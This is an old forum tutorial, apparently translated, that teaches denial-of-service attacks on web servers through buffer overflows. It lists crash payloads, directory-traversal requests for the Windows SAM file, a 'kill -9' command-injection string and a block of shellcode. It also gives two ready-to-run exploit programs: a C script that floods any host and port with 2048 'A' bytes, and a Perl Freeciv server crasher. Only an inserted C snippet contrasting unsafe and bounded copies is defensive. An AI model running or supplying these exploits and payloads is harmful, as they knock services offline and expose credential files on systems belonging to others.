Tutorial Exploit Denial Of Service

Post by Admin Sun Mar 16, 2008 12:57 pm

This tutorial is written briefly but in an easy-to-understand way, since I myself am also rather lazy about writing at length.


It also does not explain directly what an 'Exploit' or 'DoS' is, or how to build an exploit by hand in detail.

To the point!


Suppose there is a web server program affected by a buffer overflow. To find out whether that web server can be knocked over with a Denial of Service, for example:

Open telnet and connect to the target machine.

telnet> o target.com 80
connected to host..

GET <string>

If the server goes DOWN/CRASHES after this, it is fair to say the request caused a Denial of Service.

Below are the request strings commonly used to attempt a Denial of Service against a web server:

1. Using a very long string
- GET A x 2140
- POST A x 2140
- GET / HTTP/1.0
  User-Agent: <4000 x A>

2. Requesting a file outside the web server's document root (directory traversal)
- GET .././../windows/repair/sam
- GET ../bin/kill%20-9%200|
- GET /cgi-bin/julianlove?type=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

3. Using exploit shellcode
- char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\x34\x0a\x7c\xa8\x62"
"\x5d\xa4\x91\x10\x12\xa4\xb8\x08\x81\x7b\xf8\x4c\x0b\xc5\x76\x7e"
"\x12\xa4\xa7\x14\x0b\xc4\x1e\x06\x43\xa4\xc9\xbf\x0b\xc1\xcc\xcb"
"\xf6\x1e\x3d\x98\x32\xcf\x89\x33\xcb\xe0\xf0\x35\xcd\xc4\x0f\x0f"
"\x76\x0b\xe9\x41\xeb\xa4\xa7\x10\x0b\xc4\x9b\xbf\x06\x64\x76\x6e"
"\x16\x2e\x16\xbf\x0e\xa4\xfc\xdc\xe1\x2d\xcc\xf4\x55\x71\xa0\x6f"
"\xc8\x27\xfd\x6a\x60\x1f\xa4\x50\x81\x36\x76\x6f\x06\xa4\xa6\x28"
"\x81\x34\x76\x6f\x02\x7c\x95\xba\x44\x21\x11\xcb\xdc\xa6\x3a\xb5"
"\xe6\x2f\xfc\x34\x0a\x78\xab\x67\x83\xca\x15\x13\x0a\x2f\xfd\xa4"
"\x0b\x2f\xfd\x82\x13\x37\x1a\x90\x13\x5f\x14\xd1\x43\xa9\xb4\x90"
"\x10\x5f\x3a\x90\xa7\x01\x14\xed\x03\xda\x50\xff\xe7\xd3\xc6\x63"
"\x59\x1d\xa2\x07\x38\x2f\xa6\xb9\x41\x0f\xac\xcb\xdd\xa6\x22\xbd"
"\xc9\xa2\x88\x20\x60\x28\xa4\x65\x59\xd0\xc9\xbb\xf5\x7a\xf9\x6d"
"\x83\x2b\x73\xd6\xf8\x04\xda\x60\xf5\x18\x02\x61\x3a\x1e\x3d\x64"
"\x5a\x7f\xad\x74\x5a\x6f\xad\xcb\x5f\x03\x74\xf3\x3b\xf4\xae\x67"
"\x62\x2d\xfd\x25\x56\xa6\x1d\x5e\x1a\x7f\xaa\xcb\x5f\x0b\xae\x63"
"\xf5\x7a\xd5\x67\x5e\x78\x02\x61\x2a\xa6\x3a\x5c\x49\x62\xb9\x34"
"\x83\xcc\x7a\xce\x3b\xef\x70\x48\x2e\x83\x97\x21\x53\xdc\x56\xb3"
"\xf0\xac\x11\x60\xcc\x6b\xd9\x24\x4e\x49\x3a\x70\x2e\x13\xfc\x35"
"\x83\x53\xd9\x7c\x83\x53\xd9\x78\x83\x53\xd9\x64\x87\x6b\xd9\x24"
"\x5e\x7f\xac\x65\x5b\x6e\xac\x7d\x5b\x7e\xae\x65\xf5\x5a\xfd\x5c"
"\x78\xd1\x4e\x22\xf5\x7a\xf9\xcb\xda\xa6\x1b\xcb\x7f\x2f\x95\x99"
"\xd3\x2a\x33\xcb\x5f\x2b\x74\xf7\x60\xd0\x02\x02\xf5\xfc\x02\x41"
"\x0a\x47\x0d\xbe\x0e\x70\x02\x61\x0e\x1e\x26\x67\xf5\xff\xfd";


Try the others yourself, or read the latest exploits/vulnerabilities published on security/hacker research sites.

Once a web server that can be DoS'ed has been found, it is time to write the exploit in C/C++ or Perl.


user@linux:~/ > telnet localhost 80
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
GET HTTP/1.1
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


// By sending a run of 'A' characters of around 1024 bytes or more, the web server
// hits a buffer overflow and immediately CRASHES / goes DOWN.

Why does it crash?
Look at the output from gdb:

Program received signal SIGSEGV, Segmentation fault.

0x41414141 ?? ()

(gdb)

As we can see, eip has been set to 0x41414141.

0x41 is the ASCII code for 'A'. When more than 1024 bytes are supplied, the program copies a name string of 2048 bytes into a buffer of only 1024 bytes. Because 2048 is larger than 1024, the copy runs past the end of the buffer and overwrites what follows it on the stack, including the saved EIP (extended instruction pointer):

[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]

[xxxxx buffer-only-1024-bytes xxx] [EIP]

On return, execution therefore jumps to an invalid address (0x41414141); that is what is reported as a segmentation fault.
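The following is an added example, not code from the original post: it models the frame layout sketched above ([buffer 1024 bytes][EIP]) as an explicit byte array, then runs the tutorial's 2048-byte run of 'A' through an unbounded copy and through a length-checked copy, and reads back what landed in the saved-EIP slot. The frame is modelled rather than the program's real stack so the result is deterministic and the demo itself never corrupts memory; the original return address 0x08048abc is a made-up placeholder.

```c
/* Added example: model the [buffer 1024][saved EIP] frame from the tutorial
 * and show why an unbounded copy of a 2048-byte "name" lands in EIP while a
 * bounded copy does not. The frame is a plain byte array, so this program is
 * memory-safe even in the "vulnerable" case. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   1024                          /* buffer[1024] in the text */
#define FRAME_SIZE (BUF_SIZE + sizeof(uint32_t)) /* buffer + saved EIP        */
#define ORIG_EIP   0x08048abcu                   /* hypothetical legit return */

/* Lay out a fresh frame: zeroed buffer followed by the saved return address. */
static void init_frame(unsigned char frame[FRAME_SIZE]) {
    uint32_t eip = ORIG_EIP;
    memset(frame, 0, BUF_SIZE);
    memcpy(frame + BUF_SIZE, &eip, sizeof eip);
}

/* Read the saved-EIP slot that sits right after the buffer. */
static uint32_t saved_eip(const unsigned char frame[FRAME_SIZE]) {
    uint32_t eip;
    memcpy(&eip, frame + BUF_SIZE, sizeof eip);
    return eip;
}

/* Vulnerable pattern: the request "name" is copied into the 1024-byte buffer
 * with no check against BUF_SIZE. The only clamp is to the modelled frame so
 * this demo stays in bounds; it is NOT a fix, the copy still overruns buffer. */
static uint32_t copy_unbounded(const char *name, size_t len) {
    unsigned char frame[FRAME_SIZE];
    init_frame(frame);
    if (len > FRAME_SIZE) len = FRAME_SIZE;   /* model limit only */
    memcpy(frame, name, len);                 /* runs past buffer into EIP */
    return saved_eip(frame);
}

/* Hardened pattern: truncate at the buffer's own size and NUL-terminate, so
 * nothing past buffer[1023] is ever written. */
static uint32_t copy_bounded(const char *name, size_t len) {
    unsigned char frame[FRAME_SIZE];
    size_t n = len < BUF_SIZE - 1 ? len : BUF_SIZE - 1;
    init_frame(frame);
    memcpy(frame, name, n);
    frame[n] = '\0';
    return saved_eip(frame);
}

/* Build a name of name_len 'A' bytes (the tutorial's payload), feed it to one
 * of the two copy routines and return the saved EIP afterwards. */
static uint32_t run_case(size_t name_len, int bounded) {
    static char name[2048];
    if (name_len > sizeof name) name_len = sizeof name;
    memset(name, 'A', name_len);
    return bounded ? copy_bounded(name, name_len)
                   : copy_unbounded(name, name_len);
}

int main(void) {
    printf("2048 x 'A', unbounded copy: saved EIP = 0x%08x\n", run_case(2048, 0));
    printf("2048 x 'A', bounded copy:   saved EIP = 0x%08x\n", run_case(2048, 1));
    printf("100 x 'A',  unbounded copy: saved EIP = 0x%08x\n", run_case(100, 0));
    return 0;
}
```

The unbounded case reproduces the `0x41414141` seen in the gdb output above; anything shorter than the buffer, or any copy that respects BUF_SIZE, leaves the return address untouched.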


--------- D0S.c ----------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

int main(int argc, char **argv)
{
    struct sockaddr_in addr;
    struct hostent *host;
    char buffer[2048];
    int s, i;

    if (argc != 3) {
        fprintf(stderr, "Usage: %s <host> <port>\n", argv[0]);
        exit(1);
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1) {
        perror("socket() ERROR");
        exit(1);
    }

    host = gethostbyname(argv[1]);
    if (host == NULL) {
        herror("gethostbyname() ERROR");
        exit(1);
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_addr = *(struct in_addr *)host->h_addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(atoi(argv[2]));

    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        perror("Connection to host ERROR");
        exit(1);
    }

    /* Fill the buffer with 2048 'A' characters */
    for (i = 0; i < 2048; i++)
        buffer[i] = 'A';
    /* 'A' is the filler byte used to trigger the buffer overflow. The buffer is
       deliberately not NUL-terminated, so send sizeof(buffer) rather than
       strlen(buffer), which would read past the end. */

    printf("buffer is: %.*s\n", (int)sizeof(buffer), buffer);
    printf("buffer filled... now sending buffer\n");

    /* send() writes the buffer over the connected socket */
    send(s, buffer, sizeof(buffer), 0);

    printf("buffer sent.\n");

    close(s);

    return 0;
}

Below is an example of a server vulnerable to a Denial of Service (the Freeciv game server, per the script header), triggered by sending the string '@+2.0 conn_ping_info username_info-beta8'.


------------ D0S.pl -----------------

#!/usr/bin/perl
# Freeciv Server DoS Exploit
# --------------------------
#
# Greets: Nico Spicher (discovered the bug)
# info: 98.to/infamous

use strict;
use warnings;
use IO::Socket;

my $host = $ARGV[0];
my $port = 5555;   # port used: '5555'

if (!$host) {
    print "Freeciv Server DoS Exploit\n";
    print "==========================\n";
    print "INFGP-Hacking&Security Research\n";
    print "[^]\n\n";
    print "Usage: perl $0 [target]\n";
    exit(1);
}

# First connection is only a probe: is the port reachable at all?
my $socket = IO::Socket::INET->new( PeerAddr => $host,
                                    PeerPort => $port,
                                    Proto    => 'tcp',
                                    Type     => SOCK_STREAM )
    or die "Host not found\n";
close($socket);
print "[+]Attacking host..\n";

my $conn = IO::Socket::INET->new( PeerAddr => $host,
                                  PeerPort => $port,
                                  Proto    => 'tcp',
                                  Type     => SOCK_STREAM )
    or die "Host not found\n";

print "[+]Connect on $port\n\n";

print "[+]Creating string\n";

# '$line' is the string sent as the DoS trigger, playing the same role as
# "GET 'A' x 1240" against a web server, e.g.
#   $line = "GET " . ("A" x 1240) . " HTTP/1.1";
# Single quotes are required here: in a double-quoted string Perl would
# interpolate '@+' (the match-offset array) and mangle the payload.
my $line = '@+2.0 conn_ping_info username_info-beta8';

# Once connected, printing to the socket handle sends the '$line' buffer
# to the server.
print $conn $line;

print "[+]String sent..\n\n";

close($conn);

print "Server killed\n";
exit(0);



----------------------------------------- EOF -------------------------------------------


That is the little bit of knowledge I have picked up; hopefully it helps in writing a simple yet understandable DoS exploit. Happy trying!